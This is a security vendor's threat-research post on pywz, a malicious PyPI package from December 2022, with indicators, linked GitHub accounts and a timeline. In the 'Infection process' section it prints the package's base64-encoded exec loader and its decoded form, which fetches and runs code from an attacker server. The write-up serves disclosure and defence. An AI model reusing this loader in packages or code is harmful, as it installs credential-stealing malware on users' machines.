Apiiro’s AI engine detected a software supply chain attack in PyPI

Summary

Apiiro’s AI Detection Engine discovered yesterday a malicious package in PyPI package manager, which was uploaded on Dec 2nd.

Once installed, the malicious package, pywz, is decoding a base64 string and executing the decoded Python code. Upon execution, the code is sending an HTTP request to hxxp[:]//20.82.144.179/inject/ZuMraKSQ712AqmF9 and then it stores the response as a local temp file.

Then it’s renaming the file to .exe and running the malicious exe file. The adversary targets mainly windows users. It intended to grab Registry secret keys and passwords in order to leak them to the adversarial entity.

We were able to locate 11 GitHub accounts with repositories that install this malicious package. We notified Pypi about the malicious package and GitHub about the malicious repositories and the suspicious accounts

Detailed Breakdown

The malicious package details in pypi:

• Name: pywz
• Title: Python logging handler that sends messages to Loggly
• Homepage: links to https://github.com/kennedyj/pywz/ – the GitHub account is legit but the repo isn’t really stored there. One of the legit repos in this account is loggly-handler, which has a similar title: Python Logging Loggly Handler. That might be one of the reasons the malicious actor linked the malicious pypi package to this specific legitimate Github account.
• Author: Josh Kennedy – this is the legitimate owner of the GitHub account, which was piggybacked by the malicious actor without Mr. Kennedy’s knowledge.
• Maintainer: https://pypi.org/user/Portugal/ – Joined pypi on Nov 28, 2022 and contributed to the malicious package only.
• Released date: Dec 2, 2022

Some screenshots:

Infection process

The following analysis refers to the updated version of pywz (0.1.4), released on Dec 7th 2022.

Once installed, the malicious package, pywz, is decoding a base64 string and executing the decoded Python code.

The base64 encoded Python code

;__import__('builtins').exec(__import__('builtins').compile(__import__('base64').b64decode("ZnJvbSB0ZW1wZmlsZSBpbXBvcnQgTmFtZWRUZW1wb3JhcnlGaWxlIGFzIF9mZmlsZQpmcm9tIHN5cyBpbXBvcnQgZXhlY3V0YWJsZSBhcyBfZWV4ZWN1dGFibGUKZnJvbSBvcyBpbXBvcnQgc3lzdGVtIGFzIF9zc3lzdGVtCl90dG1wID0gX2ZmaWxlKGRlbGV0ZT1GYWxzZSkKX3R0bXAud3JpdGUoYiIiImZyb20gdXJsbGliLnJlcXVlc3QgaW1wb3J0IHVybG9wZW4gYXMgX3V1cmxvcGVuO2V4ZWMoX3V1cmxvcGVuKCdodHRwOi8vMjAuODIuMTQ0LjE3OS9pbmplY3QvWnVNcmFLU1E3MTJBcW1GOScpLnJlYWQoKSkiIiIpCl90dG1wLmNsb3NlKCkKdHJ5OiBfc3N5c3RlbShmInN0YXJ0IHtfZWV4ZWN1dGFibGUucmVwbGFjZSgnLmV4ZScsICd3LmV4ZScpfSB7X3R0bXAubmFtZX0iKQpleGNlcHQ6IHBhc3M="),'<string>','exec'))

The decode Python code

from tempfile import NamedTemporaryFile as _ffile
from sys import executable as _eexecutable
from os import system as _ssystem
_ttmp = _ffile(delete=False)
_ttmp.write(b"""from urllib.request import urlopen as _uurlopen;exec(_uurlopen('hxxp[:]//20.82.144.179/inject/ZuMraKSQ712AqmF9').read())""")
_ttmp.close()
try: _ssystem(f"start {_eexecutable.replace('.exe', 'w.exe')} {_ttmp.name}")
except: pass<br />

Screenshots

Upon execution, the Python code is sending an HTTP request to hxxp://20.82.144.179/inject/ZuMraKSQ712AqmF9 and then it stores the response as a local temp file. Then, it’s running the malicious exe file. 

Malicious payload analysis highlights

The attackers were using a known obfuscator for python named Oxyry in order to obfuscate their retracted payload code.

The adversary targets mainly windows users. It intended to grab Registry secret keys and passwords in order to leak them to the adversarial entity.

Code is staying resident and polling the server for a python module and rerun once payload is downloaded.

GitHub accounts

We were able to locate the following Github project that installs the malicious Pypi package: hxxps://github.com/mobcode1337/Twitter-Account-Creator The repo was uploaded two weeks ago by mobcode1337, a contributor that joined Github on 25/9/22.

This Github repo has 20 stars and 10 forks. The forks lead us to another 10 suspicious accounts that share also forks of two other repos by the same malicious user:

https://github.com/smallest/Twitter-Scrapper and https://github.com/smallest/Valorant-Checker

While analyzing the requirements file of these repositories, we identified coloriv, another malicious pypi package that share the same infection mechanism of pywz.

The majority of the users with those accounts joined Github during the last month.

After further analyzing mobcode1337 Github account, we identified another repo that installs the same pywz malicious package: hxxps[:]//github[.]com/mobcode1337/DM-Killer

This repo has 19 stars and 8 forks.

Incident Timeline

• November 22nd, 2022 – mobcode1337 account registered on GitHub.
  • Since inception until the end of the campaign mobcode1337 have been uploading alleged hacking and cheating tools that contained mention to a package named pywz under the programs’ dependency requirements.
  • The first uploaded repositories with such mention are Twitter-Account-Creator and Twitter-Scrapper.
• December 2nd, 2022 – Package pywz version 0.1.2 appeared on PyPI registry under the author ‘Portugal’. Non-malicious, copy of logging-handler, under a different name.
• December 2nd 2022 – Minutes after first upload. pywz version 0.1.3 appeared on PyPi. This time, containing malicious code, instructing connection to C2 server and propagating malicious payload further on.
• December 5th, 2022 – mobcode1337 uploads DM-Killer repo to GitHub. It also contains a mention to pywz under the programs’ dependency requirements.
• December 6th, 2022 – Apiiro AI analysis system have been marking pywz as malicious, which was confirmed by a manual analysis step.
• December 6th, 2022 – Apiiro researchers informed PyPi admins of the code-of-conduct breach in an ask to act upon the incident and take-down the malicious package and remediate against the malicious actor.
• December 7th 2022 – pywz version 0.1.4 appeared on PyPi. This time, the C2 server is updated with a new IP address.

Conclusions

Legacy SCA, SAST, or current software supply chain security tools, will not identify this type of vulnerability. Why? First and foremost, these tools are not scanning the package source code or analyzing the open source developers’ behavior and reputation, they only match between CVEs to a package.

At Apiiro, we combine several adaptive AI-based approaches that enable the detection of advanced application-level and software supply chain attacks. The approaches cover all the attack aspects:

• Developer’s behavior, reputation, development patterns of the package, and the usages of AppSec practices
• References to the package in public repositories
• Relations with similar packages
• Mentions of the package in public sources, and their corresponding NLP context
• And, of course – the package source code

A comprehensive approach is essential to the detection of such advanced attacks. Such an approach conceptualizes the attack and gives it context – the package developer’s behavior, reputation, development process, artificial usages, and the packages it tries to mimic. Given such a rich context – quick attack detection is possible.